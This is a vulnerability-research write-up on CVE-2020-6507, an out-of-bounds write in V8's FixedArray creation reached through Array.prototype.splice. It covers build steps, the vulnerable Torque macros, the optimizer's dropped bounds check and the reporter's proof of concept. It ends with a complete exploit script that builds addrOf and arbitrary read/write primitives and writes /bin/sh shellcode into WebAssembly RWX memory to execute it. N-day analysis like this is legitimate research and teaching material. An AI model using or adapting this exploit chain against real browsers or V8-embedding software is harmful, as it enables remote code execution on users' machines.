[VR] - V8 N-Day Analysis CVE-2020-6507

index

Overview

CVE-2020-6507 is an out-of-bounds write vulnerability in the V8 JavaScript engine caused by missing length validation when creating FixedArray objects. The bug allows an attacker to allocate arrays with exceed lengths.

Environment Setup

To reproduce and analyze the vulnerability, set up the environment as follows:

1
#!/bin/bash
2

3
# Clone depot_tools
4
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
5

6
# Setup environment for V8 build
7
export PATH=`pwd`/depot_tools:"$PATH"
8
fetch v8 --nohooks
9
cd v8
10
./build/install-build-deps.sh
11
sudo apt-get install ninja-build
12

13
# Checkout vulnerable commit
14
git checkout 64cadfcf4a56c0b3b9d3b5cc00905483850d6559
15
gclient sync -D
16

17
# Build debug and release versions
18
tools/dev/gm.py x64.release
19
tools/dev/gm.py x64.debug

Note that if you’re using Ubuntu 22.04 or later, you may need to modify these things:

Modify gm.py shebang to #!/usr/bin/env python3
Change from collections import Mapping to from collections.abc import Mapping in third_party/jinja2/tests.py

And during the build, you might encounter an error related to libstdc++. To fix this, you can create a symlink:

1
#!/bin/bash
2

3
TOOLLIB=third_party/llvm-build/Release+Asserts/lib
4
mkdir -p /tmp/v8-libstdcxx-bak
5
cp -a $TOOLLIB/libstdc++.so.6* /tmp/v8-libstdcxx-bak/ 2>/dev/null || true
6

7
real=$(realpath /usr/lib/x86_64-linux-gnu/libstdc++.so.6)
8
cp -av "$real" "$TOOLLIB/"
9

10
ln -sf "$(basename "$real")" "$TOOLLIB/libstdc++.so.6" 2>/dev/null || \
11
cp -av "$real" "$TOOLLIB/libstdc++.so.6"

then rerun the build command again.

Basic Concepts

Before diving into the vulnerability analysis, it’s essential to understand some basic concepts related to V8’s memory management and array handling. I highly recommend reading the following articles:

Bug Location

The vulnerability is located at src/objects/fixed-array.tq, specifically in the NewFixedArray and NewFixedDoubleArray macros:

1
macro NewFixedArray<Iterator: type>(length: intptr, it: Iterator): FixedArray {
2
  if (length == 0) return kEmptyFixedArray;
3
  return new
4
  FixedArray{map: kFixedArrayMap, length: Convert<Smi>(length), objects: ...it};
5
}
6

7
macro NewFixedDoubleArray<Iterator: type>(
8
    length: intptr, it: Iterator): FixedDoubleArray|EmptyFixedArray {
9
  if (length == 0) return kEmptyFixedArray;
10
  return new FixedDoubleArray{
11
    map: kFixedDoubleArrayMap,
12
    length: Convert<Smi>(length),
13
    floats: ...it
14
  };
15
}

Since there is no validation of the length parameter before Convert<Smi>(length). Creating a FixedArray with that function can exceed the maximum length of FixedArray (FixedDoubleArray::kMaxLength = 0x3fffffe). Moreover, the FixedDoubleArray::kMaxLength (0x3FFFFFE) is less than Smi::kMaxValue (0x3FFFFFFF), allowing us to construct an array just below the Smi limit. Here is the way to calculate both kMaxLength values:

1
class Smi : public Object {
2
  static constexpr int kMaxValue = kSmiMaxValue;
3
};
4

5
// src/objects/fixed-array.h
6
class FixedArrayBase : public HeapObject {
7
  const length: Smi;  // ← Length field is a Smi
8
  static const int kMaxSize = 128 * kTaggedSize * MB - kTaggedSize;
9
};
10

11
class FixedDoubleArray : public FixedArrayBase {
12
  floats[length]: float64_or_hole;
13
  static const int kMaxLength = (kMaxSize - kHeaderSize) / kDoubleSize;
14
};
15

16
// Calculations:
17
// kMaxSize = 128 * 4 * 1024 * 1024 - 4 = 0x1FFFFFFC (536,870,908 bytes)
18
// kHeaderSize = 8  (map pointer + length Smi)
19
// kDoubleSize = 8
20
// kMaxLength = (0x1FFFFFFC - 8) / 8 = 0x3FFFFFE (67,108,862)
21
// Smi::kMaxValue = 2^30 - 1 = 0x3FFFFFFF (1,073,741,823)

Exploitation Path

The vulnerability is reachable via the following call chain when using Array.prototype.splice() on a near-maximum-size array:

1
ArrayPrototypeSplice
2
  ↓
3
FastArraySplice
4
  ↓
5
FastSplice<FixedDoubleArray, Number>
6
  ↓
7
Extract
8
  ↓
9
ExtractFixedArray
10
  ↓
11
NewFixedArray (vulnerable)

Code Path Details

1
transitioning macro FastArraySplice(
2
  [...]
3
  if (IsFastSmiOrTaggedElementsKind(elementsKind)) {
4
    FastSplice<FixedArray, JSAny>(
5
        args, a, length, newLength, actualStart, insertCount,
6
        actualDeleteCount);
7
  } else {
8
    FastSplice<FixedDoubleArray, Number>(
9
        args, a, length, newLength, actualStart, insertCount,
10
        actualDeleteCount);
11
  }
12
  return deletedResult;
13
}
14

15
macro FastSplice<FixedArrayType : type extends FixedArrayBase, ElementType: type>(
16
    implicit context: Context)(
17
  [...]
18
  if (insertCount != actualDeleteCount) {
19
    [...]
20
    const newElements: FixedArrayType = UnsafeCast<FixedArrayType>(
21
        Extract(elements, 0, actualStart, capacity));
22
    [...]
23
  }
24
  [...]
25
}
26

27
macro Extract(implicit context: Context)(
28
    source: FixedArray, startIndex: Smi, count: Smi,
29
    resultCapacity: Smi): FixedArray {
30
  return ExtractFixedArray(
31
      source, Convert<intptr>(startIndex), Convert<intptr>(count),
32
      Convert<intptr>(resultCapacity));
33
}
34

35
macro ExtractFixedArray(
36
    source: FixedArray, first: intptr, count: intptr,
37
    capacity: intptr): FixedArray {
38
  // TODO(turbofan): This should be optimized to use memcpy for initialization.
39
  return NewFixedArray(
40
      capacity,
41
      IteratorSequence<Object>(
42
          (&source.objects).Iterator(first, first + count),
43
          ConstantIterator(TheHole)));
44
}

Proof of Concept

Below is a PoC given by Reporter:

1
array = Array(0x40000).fill(1.1);
2
args = Array(0x100 - 1).fill(array);
3
args.push(Array(0x40000 - 4).fill(2.2));
4
giant_array = Array.prototype.concat.apply([], args);
5

6
giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
7

8

9
print(giant_array.length.toString(16));

Let’s break down the PoC:

We create giant_array with length 0x3FFFFFC (just below FixedDoubleArray::kMaxLength).
- One array of length 0x40000 (16,384) filled with 1.1
- 0xFF arrays of length 0x40000 filled with 2.2
- We use Array.prototype.concat.apply to flatten these into giant_array.
- So that the total length is 255 * 0x40000 + (0x40000 - 4) = 0x3fffffc.
Next, we call giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3); to splice at the end of the array, inserting three new elements (3.3, 3.3, 3.3). Under the hood, we still pass all the checks and reach NewFixedArray with capacity = 0x3ffffff (which is 0x3FFFFFC + 3).

Make OOB array

We can abuse TypedOptimization::ReduceMaybeGrowFastElements to create an out-of-bounds array in this case:

1
Reduction TypedOptimization::ReduceMaybeGrowFastElements(Node* node) {
2
  Node* const elements = NodeProperties::GetValueInput(node, 1);
3
  Node* const index = NodeProperties::GetValueInput(node, 2); // [1]
4
  Node* const length = NodeProperties::GetValueInput(node, 3); // [2]
5
  Node* const effect = NodeProperties::GetEffectInput(node);
6
  Node* const control = NodeProperties::GetControlInput(node);
7

8
  Type const index_type = NodeProperties::GetType(index);
9
  Type const length_type = NodeProperties::GetType(length);
10

11
  // Both `index` and `length` need to be unsigned Smis
12
  CHECK(index_type.Is(Type::Unsigned31()));
13
  CHECK(length_type.Is(Type::Unsigned31()));
14

15
  if (!index_type.IsNone() && !length_type.IsNone() && // [3]
16
      index_type.Max() < length_type.Min()) {
17
    Node* check_bounds = graph()->NewNode( // [4]
18
        simplified()->CheckBounds(FeedbackSource{},
19
                                  CheckBoundsFlag::kAbortOnOutOfBounds),
20
        index, length, effect, control);
21
    ReplaceWithValue(node, elements); // [5]
22
    return Replace(check_bounds);
23
  }
24

25
  return NoChange();
26
}

Although the function adds type and range checks at [1], [2], and [3], the mitigation is ineffective in practice. When the optimizer believes index_type.Max() < length_type.Min(), it inserts a new CheckBounds node at [4]. But immediately afterward, ReplaceWithValue(node, elements) at [5] rewires the graph so the original node’s effect chain is already updated, and the value produced by CheckBounds is not actually used by any consumer.

Because the inserted CheckBounds node ends up with no meaningful value/effect usage, later optimization passes consider it dead and eliminate it. The end result is that the intended bounds check disappears, leaving a path where the typer’s incorrect “no growth needed” assumption can still be abused to obtain out-of-bounds access.

Exploit

Combine all, we have the following PoC that can archive Remote Code Execution:

1
/*
2
Exploit for V8 CVE-2020-6507
3
Commit: 64cadfcf4a56c0b3b9d3b5cc00905483850d6559
4

5
References:
6
- https://bugs.chromium.org/p/chromium/issues/detail?id=1086890
7
- https://github.com/anvbis/chrome_v8_ndays/blob/master/cve-2020-6507.js
8
- https://www.y4y.space/2022/08/05/browser-exploitation-a-case-study-of-cve-2020-6507/
9

10
Patch:
11
- https://chromium.googlesource.com/v8/v8.git/+/3d9272cf7ab64b7fe76de02c859daae0588e8370
12
*/
13

14
var buf = new ArrayBuffer(8);
15
var f64_buf = new Float64Array(buf);
16
var u64_buf = new BigUint64Array(buf);
17
var u32_buf = new Uint32Array(buf);
18

19
function f2i(val) {
20
    f64_buf[0] = val;
21
    return u64_buf[0];
22
}
23

24
function i2f(val) {
25
    u64_buf[0] = BigInt(val);
26
    return f64_buf[0];
27
}
28

29
function i2u_lo(i) {
30
    u64_buf[0] = BigInt(i);
31
    return u32_buf[0];
32
}
33

34
function i2u_hi(i) {
35
    u64_buf[0] = BigInt(i);
36
    return u32_buf[1];
37
}
38

39
function u2f(lo, hi) {
40
    u32_buf[0] = lo;
41
    u32_buf[1] = hi;
42
    return f64_buf[0];
43
}
44

45
const logInfo = (m) => print(`[*] ${m}`);
46
const logOK = (m) => print(`[+] ${m}`);
47
const logErr = (m) => print(`[-] ${m}`);
48

49
function toHex(x, w = 16) {
50
    x = BigInt.asUintN(64, BigInt(x));
51
    return "0x" + x.toString(16);
52
}
53

54
function gc() {
55
    for (var i = 0; i < 0x10000; ++i)
56
        var a = new ArrayBuffer();
57
}
58

59
array = Array(0x40000).fill(1.1);
60
args = Array(0x100 - 1).fill(array);
61
args.push(Array(0x40000 - 4).fill(2.2));
62
giant_array = Array.prototype.concat.apply([], args);
63
giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
64

65
// Length @ 0x1337 || Elements @ 0x83c03e5 (point to corrupted_array's elements)
66
length_as_double = i2f((0x1337n << 33n) + 0x83c03e5n);
67

68
function trigger(array) {
69
    var x = array.length; // 0x3ffffff
70
    x -= 0x3fffffd; // 2
71
    x = Math.max(x, 0); // 2
72
    x *= 6; // 12
73
    x -= 5; // 7
74
    x = Math.max(x, 0); // 7
75

76
    let corrupting_array = [1.1, 1.1];
77
    let corrupted_array = [2.2];
78
    corrupting_array[x] = length_as_double;
79
    return [corrupting_array, corrupted_array];
80
}
81

82
%PrepareFunctionForOptimization(trigger);
83
trigger(giant_array);
84
%OptimizeFunctionOnNextCall(trigger);
85

86
let corrupted_array = trigger(giant_array)[1];
87
logInfo("Corrupted array length: " + toHex(corrupted_array.length));
88

89
let arr = [1.1];
90
let obj = { m: 13.37 };
91

92
gc(); gc();
93

94
let double_array_map = i2u_lo(f2i(corrupted_array[14]));
95
logInfo("double array map: " + toHex(double_array_map));
96

97
function AddrOf(target) {
98
    obj[0] = target;
99
    corrupted_array[16] = u2f(double_array_map, 0);
100
    return i2u_lo(f2i(obj[0]));
101
}
102

103
function arbRead(addr) {
104

105
    if (addr % 2 == 0)
106
        addr += 1;
107

108
    corrupted_array[16] = u2f(double_array_map, 0);
109
    corrupted_array[17] = u2f(addr - 0x8, 100);
110
    return f2i(obj[0]);
111
}
112

113
function arbWrite(addr, value) {
114

115
    if (addr % 2 == 0)
116
        addr += 1;
117

118
    corrupted_array[16] = u2f(double_array_map, 0);
119
    corrupted_array[17] = u2f(addr - 0x8, 100);
120
    obj[0] = i2f(value);
121
}
122

123
let wasm_code = new Uint8Array([
124
    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x05, 0x01, 0x60,
125
    0x00, 0x01, 0x7f, 0x03, 0x02, 0x01, 0x00, 0x07, 0x08, 0x01, 0x04, 0x6d,
126
    0x61, 0x69, 0x6e, 0x00, 0x00, 0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a,
127
    0x0b
128
]);
129

130
let wasm_mod = new WebAssembly.Module(wasm_code);
131
let wasm_instance = new WebAssembly.Instance(wasm_mod);
132
let f = wasm_instance.exports.main;
133

134
let wasm_inst_addr = AddrOf(wasm_instance);
135
logOK("WASM Instance addr: " + toHex(wasm_inst_addr));
136

137
let rwx = arbRead(wasm_inst_addr + 0x68);
138
logOK("WASM RWX addr: " + toHex(rwx));
139

140
let shellcode = [
141
    0x90909090, 0x90909090, 0xb848686a, 0x6e69622f, 0x732f2f2f, 0xe7894850,
142
    0x01697268, 0x24348101, 0x01010101, 0x6a56f631, 0x01485e08, 0x894856e6,
143
    0x6ad231e6, 0x050f583b
144
];
145

146
let buffer = new ArrayBuffer(shellcode.length * 4);
147
let view = new DataView(buffer);
148

149
let buffer_backing_store = AddrOf(buffer) + 0x14;
150
logOK("ArrayBuffer backing store pointer: " + toHex(buffer_backing_store));
151

152
logInfo("Writing shellcode to RWX memory...");
153

154
arbWrite(buffer_backing_store, rwx);
155

156
for (let i = 0; i < shellcode.length; i++) {
157
    view.setUint32(i * 4, shellcode[i], true);
158
}
159

160
logInfo("Executing shellcode...");
161
f();